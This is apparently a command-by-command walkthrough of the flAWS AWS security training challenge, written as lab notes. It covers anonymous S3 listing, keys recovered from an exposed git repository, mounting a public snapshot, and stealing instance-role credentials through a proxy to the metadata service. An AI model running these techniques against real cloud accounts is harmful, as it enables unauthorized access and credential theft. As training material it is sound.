# flAWS challenge


Level 1: Directory (bucket) listing - Everyone

# # --no-sign-request: Do not sign requests. Credentials will not be loaded if this argument is provided.
# # --region (string): The region to use. Overrides config/env settings.
# aws --no-sign-request --region us-west-2 s3 ls s3://flaws.cloud/
# aws --no-sign-request --region us-west-2 s3 cp s3://flaws.cloud/secret-dd02c7c.html .
# cat secret-dd02c7c.html

Level 2: Directory (bucket) listing - Any authenticated AWS user

# aws --profile level2 configure
# aws s3 --profile level2 --region us-west-2 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# aws s3 --profile level2 --region us-west-2 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html .
# cat secret-e4443fc.html

Level 3: AWS keys leaked

# aws s3 --no-sign-request --region us-west-2 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
# aws s3 --no-sign-request --region us-west-2 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git .git
# git log
# git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87
# cat secret
# aws --profile level3 configure
# aws --profile level3 s3 ls

Level 4: Public snapshot as a backup

# aws --profile level3 --region us-west-2 sts get-caller-identity
# aws --profile level3 --region us-west-2 ec2 describe-snapshots --owner-id 975426262029
# aws --profile level2 --region us-west-2 ec2 create-volume --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
# aws --profile level2 ec2 describe-volumes --region=us-west-2
# aws --profile level2 --region us-west-2 ec2 create-security-group --group-name devenv-sg --description 'My security group'
# # --cidr 0.0.0.0/0 exposes port 22 to the whole Internet; for a throwaway dev box, scope it to your own address (e.g. <your-ip>/32) and delete the group when done.
# aws --profile level2 --region us-west-2 ec2 authorize-security-group-ingress --group-name devenv-sg --protocol tcp --port 22 --cidr 0.0.0.0/0
# aws --profile level2 --region us-west-2 ec2 create-key-pair --key-name devenv-key --query 'KeyMaterial' --output text > devenv-key.pem
# aws --profile level2 --region us-west-2 ec2 run-instances --image-id ami-29ebb519 --security-group-ids sg-xxxxxxxx --count 1 --instance-type t1.micro --key-name devenv-key --query 'Instances[0].InstanceId'
# ssh -i devenv-key.pem ubuntu@<instance-public-ip>
# mount /dev/xvdb1 /mnt
# cat /mnt/home/ubuntu/setupNginx.sh

Level 5: Metadata at 169.254.169.254

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
# # The metadata response carries temporary credentials (AccessKeyId, SecretAccessKey, Token) with an Expiration; the level5 profile needs all three, and the token entry goes in ~/.aws/credentials.
# # The lesson: a proxy that forwards to 169.254.169.254 leaks the instance role's credentials. Mitigations: require IMDSv2 (session-token hop-limited requests) and never let user-controlled URLs reach the metadata service.
# echo "aws_session_token = xx" >> .aws/credentials
# aws --profile level5 s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

Level 6: SecurityAudit policy attached

# aws --profile level6 configure
# aws --profile level6 --region us-west-2 iam get-user
# aws --profile level6 --region us-west-2 iam list-attached-user-policies --user-name Level6
# aws --profile level6 --region us-west-2 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
# aws --profile level6 --region us-west-2 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
# aws --profile level6 --region us-west-2 lambda list-functions
# aws --profile level6 --region us-west-2 lambda get-policy --function-name Level6
# aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id 's33ppypa75'
# restapiid='s33ppypa75'
# region='us-west-2'
# stagename='Prod'
# functionname='level6'
# # -k disables TLS certificate verification; it is not needed here, since execute-api endpoints present a valid certificate, and should be dropped.
# curl -k https://$restapiid.execute-api.$region.amazonaws.com/$stagename/$functionname

Reference

https://summitroute.com/blog/2017/02/26/flaws_challenge/
